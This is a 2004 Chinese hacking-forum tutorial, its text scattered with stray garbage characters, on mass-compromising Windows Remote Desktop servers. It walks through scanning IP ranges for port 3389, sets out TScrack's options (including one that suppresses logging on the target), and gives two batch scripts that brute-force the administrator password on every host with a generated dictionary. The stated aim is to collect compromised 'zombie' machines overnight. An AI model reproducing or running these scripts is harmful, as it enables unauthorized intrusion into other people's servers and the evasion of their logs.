|
作者:霜风 QQ:14226581 ' {5 H. a9 A# f& O. V6 I
终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。" |" G3 Y# U `. ]
这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: % B$ \3 _/ m: e* V3 u- G! b
首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:5 x4 u' i: i; [" O% P0 o( W
先打开superscan3如图1
- l1 T) D2 V. w
$ @. e' ]. W$ ?! N; w* s此主题相关图片如下:
) L4 E# O) M$ V3 l
$ J7 W+ j0 w: K& S* y6 L' W
I4 r+ ?* e" f4 Z接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2
# N6 `7 z2 u) ^9 m1 W* [3 S5 ?! \3 T$ n
% J: C" {8 Y9 c* a此主题相关图片如下:) B% Z# \0 d( ^' A( L9 Y- o: b, y
# j) D( e: R; U/ a4 H- f
9 E1 S9 z! w1 C5 B t3 N5 W
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.& ~0 V0 B6 e# S: b) t
这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3
; J7 P! @0 ?) Y% k: J( d s3 `5 m4 z; l2 i9 x- O- F
此主题相关图片如下:$ x* D+ J6 X9 c* K
; Z* G, x' h' v2 _, D, z5 }
; }% w3 s0 [5 { X0 N1 ?“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。! J9 |, u4 k0 n: [
0 n' c3 l- v! _
此主题相关图片如下:
- v: {. s: s" O
2 @* ` G! [9 V9 p: p接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
) d2 N. T4 q- a4 R1 u/ T4 V7 x$ F3 f# r/ V( [, e% u0 [
此主题相关图片如下:
5 @/ G3 Y3 n w. u* ~
2 J& V' t& V' D1 q( \" h0 D: p进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
( a1 _* }9 e9 E& q, q2 V" y% r所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
& x- w4 A" H' rTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。' h I# D& \; \2 j5 u6 j4 I
此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。
: o9 F0 Z& Y) p3 P" V" H8 H在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:
# e3 U8 D6 M: }% t" s-h : Print usage help and exit) t% a3 F8 v/ G+ b. S
-V : Print version info and exit, x1 I9 H8 y( Y
-s : Print chipher strenght info and exit" Q8 w( |/ p! W$ h9 U; a
-b : Enable failed password beep
# G8 F: x8 g% \# z0 X/ \-t : Use two simultaneous connections [EXPERIMENTAL]
/ Y: i% Y: C% n+ i% V-N : Prevent System Log entries on targeted server
: k! s( f. k4 ^-U : Uninstall tscrack and remove components) J3 s5 G" U: ]4 u' n% ^; P( i
-f <number> : Wordlist entry to start cracking with
! \% R/ n7 s/ q! d h-F <delay> : Sampling Frequency (Delay between samples in ms)
* l0 b$ o4 P& Y; u) H( s-l <user> : Account name to use, defaults to Administrator
- g# X0 H% v# l n-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted, S& `( x# ^0 a$ h; Q* G6 D- h
-p <password> : Use <password> to logon instead of wordlist/blank pass! [, y0 a7 ? y! U6 w6 D2 R+ `5 h! @) C
-D <domain> : Specify domain to attempt logon to ; X' Q; E2 A9 j9 H( t2 V
. |# J$ T- y ]% n, R
2 \3 I/ w" ]- H$ a9 P
我就帮忙翻译一下吧,翻译得不好可不要怪我啊:, |( u; z$ W( ~" s
-h : 显示使用帮助然后退出/ J( g0 U/ j* H, n) k0 a0 A- e
-V : 显示版本信息然后退出
0 B8 B% b( u/ v1 I-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)2 E; G) D3 _; R$ F
-b : 密码错误时发出声音7 H; u5 r9 v7 {8 o
-t : 同时发出多个连接,就是多线程。
" z% P" b" D/ g" E$ o* O-N : Prevent System Log entries on targeted server4 }" Z. Q5 w0 ~
-U : 卸载移除tscrack组件。
) P* r1 q3 L5 R( d! Q! `7 h-f <number> : 使用-F后面的密码。+ J' A+ \' u6 y8 J
-F <delay> : 间隔时间(频率)
" Z8 Z) i0 s; I6 u-l <user> : 使用-L后面的用户名# |8 B w- g' w B' y! E! \
-w <wordlist> : 使用-W后面的字典, T8 u& F8 A* B- h- b% q
-p <password> : 使用-W后的密码2 x9 K& n& H( v F9 @% L. |3 y6 v+ T5 R
-D <domain> : 登陆主页面?4 k, n. c/ j$ q/ N9 C- y
相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:9 R9 `, z6 J9 o' _
@if not exist IpcScan.txt goto noscan6 ~5 [7 Q2 k5 X9 w' `, A
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
4 Z7 P# ?( v! ]. [- s, l:noscan3 ?" f8 Q, u4 h& e/ _; {, W6 p
@echo 3389.txt no find or scan faild  4 s; B' |6 T0 k2 Z; e/ E
这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)$ t( n. K! U( ~
保存后把后错名改为BAT就可以了。
5 e/ P$ w5 V2 g9 s还写一个BAT,名字为HACK.BAT,代码如下:
" ]) b' b0 h1 g* p1 D$ i7 E( P@if not exist tscrack.exe goto noscan
0 @. d9 _; Q0 o, ^2 V@tscrack %1 -l administartor -w pass.dic >>rouji.txt6 N2 h* q3 t/ `7 |1 i$ [1 m/ X
:noscan
: Q, C+ E+ _( p7 W0 N" F V@echo tscrack.exe no find or scan faild $ w& j* X/ W" C' b4 e
这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
( g; W: O( [$ a( n' t- j制作方法如上。
0 W1 B2 m/ {- J% Z6 S然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6' C$ H$ ^2 ~! c- y
# g0 ?. k- d1 R4 ^
此主题相关图片如下:3 X: F" Y3 H/ B) I
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
/ C7 ]9 D7 o& S) v最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7* m* U4 Z& p$ v
2 y+ ~; h: \" F. r+ ]
此主题相关图片如下:
, m" S' Z3 h3 P5 {! X
! V2 O& u/ d! F3 S0 T: J7 t( e2 }怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
" n. D+ H5 D, \* I/ L/ t最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
